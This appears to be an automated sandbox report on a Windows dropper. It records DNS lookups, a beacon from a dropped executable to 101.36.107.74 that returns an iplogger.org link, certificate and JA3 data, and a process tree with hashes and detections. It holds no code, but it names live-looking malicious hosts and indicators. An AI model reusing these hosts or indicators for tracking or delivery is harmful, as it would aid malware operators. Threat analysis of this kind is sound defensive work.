Nov 28, 2020 15:07:28.885410070 CET | 8.8.8.8 | 192.168.2.5 | 0x8e02 | No error (0) | www.evograph.ro | evograph.ro | - | CNAME (Canonical name) | IN (0x0001)
Nov 28, 2020 15:07:28.885410070 CET | 8.8.8.8 | 192.168.2.5 | 0x8e02 | No error (0) | evograph.ro | - | 89.40.17.17 | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:33.187537909 CET | 8.8.8.8 | 192.168.2.5 | 0x7481 | No error (0) | 7553014bd6a4211b.xyz | - | 172.67.157.133 | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:33.187537909 CET | 8.8.8.8 | 192.168.2.5 | 0x7481 | No error (0) | 7553014bd6a4211b.xyz | - | 104.24.114.254 | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:33.187537909 CET | 8.8.8.8 | 192.168.2.5 | 0x7481 | No error (0) | 7553014bd6a4211b.xyz | - | 104.24.115.254 | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:33.189069033 CET | 8.8.8.8 | 192.168.2.5 | 0x504 | No error (0) | 7553014bd6a4211b.xyz | - | 172.67.157.133 | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:33.189069033 CET | 8.8.8.8 | 192.168.2.5 | 0x504 | No error (0) | 7553014bd6a4211b.xyz | - | 104.24.114.254 | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:33.189069033 CET | 8.8.8.8 | 192.168.2.5 | 0x504 | No error (0) | 7553014bd6a4211b.xyz | - | 104.24.115.254 | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:34.852657080 CET | 8.8.8.8 | 192.168.2.5 | 0x686 | No error (0) | trueaerned.com | - | 198.98.57.54 | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:36.410165071 CET | 8.8.8.8 | 192.168.2.5 | 0x7f6b | No error (0) | jojo-soft.xyz | - | 104.31.72.130 | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:36.410165071 CET | 8.8.8.8 | 192.168.2.5 | 0x7f6b | No error (0) | jojo-soft.xyz | - | 104.31.73.130 | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:36.410165071 CET | 8.8.8.8 | 192.168.2.5 | 0x7f6b | No error (0) | jojo-soft.xyz | - | 172.67.194.188 | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:37.142649889 CET | 8.8.8.8 | 192.168.2.5 | 0x4cea | No error (0) | ip-api.com | - | 208.95.112.1 | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:38.362081051 CET | 8.8.8.8 | 192.168.2.5 | 0x75f3 | No error (0) | p421ls.xyz | - | 104.31.90.245 | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:38.362081051 CET | 8.8.8.8 | 192.168.2.5 | 0x75f3 | No error (0) | p421ls.xyz | - | 104.31.91.245 | A (IP address) | IN (0x0001)
Nov 28, 2020 15:07:38.362081051 CET | 8.8.8.8 | 192.168.2.5 | 0x75f3 | No error (0) | p421ls.xyz | - | 172.67.160.131 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• https:
  • 101.36.107.74

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49732 | 101.36.107.74 | 80 | C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe

Timestamp | kBytes transferred | Direction | Data
Nov 28, 2020 15:07:10.385420084 CET | 4381 | OUT | GET /seemorebty/il.php?e=jg2_2qua HTTP/1.1
  Connection: Keep-Alive
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
  Accept-Language: en-US,en;q=0.9
  Referer: https://www.facebook.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
  Host: 101.36.107.74
Nov 28, 2020 15:07:10.647347927 CET | 4381 | IN | HTTP/1.1 200 OK
  Date: Sat, 28 Nov 2020 14:07:10 GMT
  Server: Apache/2.4.37 (centos)
  X-Powered-By: PHP/7.2.24
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Transfer-Encoding: chunked
  Content-Type: text/html; charset=UTF-8
  Data Raw: 31 61 0d 0a 68 74 74 70 73 3a 2f 2f 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 5a 64 6e 59 37 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 1a\r\nhttps://iplogger.org/ZdnY7\r\n0\r\n\r\n (a single chunk of 0x1a = 26 bytes carrying the URL https://iplogger.org/ZdnY7, followed by the terminating zero-length chunk)


HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest

Nov 28, 2020 15:07:10.876172066 CET | 88.99.66.31 | 443 | 192.168.2.5 | 49733
  Certificate chain (Subject | Issuer | Not Before | Not After):
  CN=*.iplogger.org | CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB | Fri Nov 20 01:00:00 CET 2020 | Sun Nov 21 00:59:59 CET 2021
  CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB | CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US | Fri Nov 02 01:00:00 CET 2018 | Wed Jan 01 00:59:59 CET 2031
  CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Tue Mar 12 01:00:00 CET 2019 | Mon Jan 01 00:59:59 CET 2029
  JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0
  JA3 SSL Client Digest: ce5f3254611a8c095a3d821d44539877

Nov 28, 2020 15:07:27.068033934 CET | 88.99.66.31 | 443 | 192.168.2.5 | 49737
  Certificate chain (Subject | Issuer | Not Before | Not After):
  CN=*.iplogger.org | CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB | Fri Nov 20 01:00:00 CET 2020 | Sun Nov 21 00:59:59 CET 2021
  CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB | CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US | Fri Nov 02 01:00:00 CET 2018 | Wed Jan 01 00:59:59 CET 2031
  CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Tue Mar 12 01:00:00 CET 2019 | Mon Jan 01 00:59:59 CET 2029
  JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
  JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 15:05:13
Start date: 28/11/2020
Path: C:\Users\user\Desktop\KeJ7Cl7flZ.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\KeJ7Cl7flZ.exe'
Imagebase: 0xec0000
File size: 7922731 bytes
MD5 hash: 4E759849412063C6590936671CE4AA0E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 15:05:15
Start date: 28/11/2020
Path: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe'
Imagebase: 0x1260000
File size: 1306112 bytes
MD5 hash: 6503C9C4F19A4B33B701CC5B97B349BC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 15:05:17
Start date: 28/11/2020
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 724
Imagebase: 0x2a0000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:05:27
Start date: 28/11/2020
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 740
Imagebase: 0x2a0000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:05:40
Start date: 28/11/2020
Path: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe'
Imagebase: 0x400000
File size: 4240136 bytes
MD5 hash: 62EAEA103DD9BEB69E884F2EDE1ACD63
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 15:05:43
Start date: 28/11/2020
Path: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe' -s
Imagebase: 0x50000
File size: 3956884 bytes
MD5 hash: D64E3CC11AFC6331715BDFEC5F26C2A0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
Reputation: low

General

Start time: 15:06:58
Start date: 28/11/2020
Path: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe'
Imagebase: 0x400000
File size: 528498344 bytes
                                                                                                              MD5 hash:0F88FD9D557FFBE67A8897FB0FC08EE7
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000013.00000002.511085870.0000000003310000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Joe Sandbox ML

                                                                                                              General

                                                                                                              Start time:15:07:08
                                                                                                              Start date:28/11/2020
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe'
                                                                                                              Imagebase:0x400000
                                                                                                              File size:574976 bytes
                                                                                                              MD5 hash:676757904C8383FD9ACBEED15AA8DCC4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML

                                                                                                              Disassembly

                                                                                                              Code Analysis
